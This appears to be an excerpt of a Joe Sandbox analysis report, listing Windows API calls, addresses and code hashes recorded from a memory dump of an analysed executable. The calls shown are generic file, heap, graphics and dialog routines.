                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                    • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                    • Opcode Fuzzy Hash: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                    • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                    • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                    • Opcode Fuzzy Hash: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                    • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                    APIs
                                                                                      • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0074BA89,?,00000000), ref: 0074BC64
                                                                                    • GetCPInfo.KERNEL32(00000000,0074BA89,?,?,?,0074BA89,?,00000000), ref: 0074BC77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                    • Instruction ID: b103f32d4360cbaba7d80a98e49fc41b5285a7f55890ebd7174dfc033e8e5156
                                                                                    • Opcode Fuzzy Hash: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                    • Instruction Fuzzy Hash: 7A512370E002459EDB248F75C8C56BABBF4EF41300F1844AED4968B262D73DEE458F90
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00729A50,?,?,00000000,?,?,00728CBC,?), ref: 00729BAB
                                                                                    • GetLastError.KERNEL32(?,00000000,00728411,-00009570,00000000,000007F3), ref: 00729BB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                    • Instruction ID: 4b3857737dd17f2a3eadb6bbc78d664c74ec5593d7e261864ce8b88e254c7fd9
                                                                                    • Opcode Fuzzy Hash: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                    • Instruction Fuzzy Hash: F941D1B1904321CFDB24DF15F58486AB7E6FFD4311F1C8A2DEA8583261E778ED448A91
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00721E55
                                                                                      • Part of subcall function 00723BBA: __EH_prolog.LIBCMT ref: 00723BBF
                                                                                    • _wcslen.LIBCMT ref: 00721EFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2838827086-0
                                                                                    • Opcode ID: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                    • Instruction ID: 692a5524c0d33b40eb7aa5c8425a48b3b745eb9bc3f35b67fd4eb69f46346cf4
                                                                                    • Opcode Fuzzy Hash: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                    • Instruction Fuzzy Hash: DB314B71905219DFDF15EF98D949AEEFBF6BF58300F6000A9E845A7251C73A5E00CB60
                                                                                    APIs
                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007273BC,?,?,?,00000000), ref: 00729DBC
                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00729E70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlushTime
                                                                                    • String ID:
                                                                                    • API String ID: 1392018926-0
                                                                                    • Opcode ID: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                    • Instruction ID: 1a62628f1d2138f256cb8baf570309c8cac28b204b3236b824cf2ea2b52cc20d
                                                                                    • Opcode Fuzzy Hash: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                    • Instruction Fuzzy Hash: AB21F032248355EBC714CF34D891AABBBE4AF51704F08481CF5C583581D32DE90C9BA2
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00729F27,?,?,0072771A), ref: 007296E6
                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00729F27,?,?,0072771A), ref: 00729716
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                    • Instruction ID: c84dbc25079a832fa0836633e22bae32a3f15d0f53cfab400dc5f2c142a5713c
                                                                                    • Opcode Fuzzy Hash: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                    • Instruction Fuzzy Hash: 5C21BDB1104354AEE3708A65DC89FA7B7DCEB49360F044A19FA96C65D2C7B8A8848671
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00729EC7
                                                                                    • GetLastError.KERNEL32 ref: 00729ED4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                    • Instruction ID: cf141fb33ffae7d850fe4ec17f7c908652f3c4040b1b4cfeec97c52057153dec
                                                                                    • Opcode Fuzzy Hash: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                    • Instruction Fuzzy Hash: A8112931A003209BD724C624D844BA6B3E9AB04370F584A29E653D25D0D378ED45C760
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00748E75
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00761098,007217CE,?,?,00000007,?,?,?,007213D6,?,00000000), ref: 00748EB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                    • String ID:
                                                                                    • API String ID: 2447670028-0
                                                                                    • Opcode ID: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                    • Instruction ID: 08ca70a93ca3b49293cb8b3aca65591e495ada77a9327a0cfc1887a2d15971e9
                                                                                    • Opcode Fuzzy Hash: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                    • Instruction Fuzzy Hash: 10F0F63270123DE6CBA12A259C08F6F37588F82B70F244126F814AB1A1DF7DCD0081A3
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 007310AB
                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 007310B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                    • String ID:
                                                                                    • API String ID: 1231390398-0
                                                                                    • Opcode ID: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                    • Instruction ID: 41b39563e812a990cc8248ee986de164608fe688eda5700eb684c3d579a8af07
                                                                                    • Opcode Fuzzy Hash: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                    • Instruction Fuzzy Hash: 7AE0D833B00249A7DF0D87B49C059EB73DEEA44345B508175E407E7102F978DE418A60
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    • Opcode ID: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                    • Instruction ID: cba96f5776b4c33538940a56fe0a7accbad1e3d2c4d9cc82b31a9c2d31e0c5fe
                                                                                    • Opcode Fuzzy Hash: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                    • Instruction Fuzzy Hash: 44F03031240319BBDF025F61EC45FDA376DAB04385F448451B949D51A0DB75DA94DA50
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641,000000FF), ref: 0072A1F1
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641), ref: 0072A21F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2643169976-0
                                                                                    • Opcode ID: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                    • Instruction ID: 79aaabc7f9f9e2ce148925b8ea89e277b2d254c419d97f9ebd9abcb2c3301f4f
                                                                                    • Opcode Fuzzy Hash: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                    • Instruction Fuzzy Hash: E3E09271140319BBEB015F60EC45FE9379CBB083C2F488021B948D20A0EB6ADE84DA64
                                                                                    APIs
                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00752641,000000FF), ref: 0073ACB0
                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00752641,000000FF), ref: 0073ACB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3856339756-0
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A254
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0073DEEC
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0073DF03
                                                                                      • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                      • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                      • Part of subcall function 0073B568: IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                      • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                      • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2718869927-0
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1175261203-0
                                                                                    APIs
                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0073A3E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                    • String ID:
                                                                                    • API String ID: 1918208029-0
                                                                                    APIs
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00742BAA
                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00742BB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1660781231-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3351165006-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
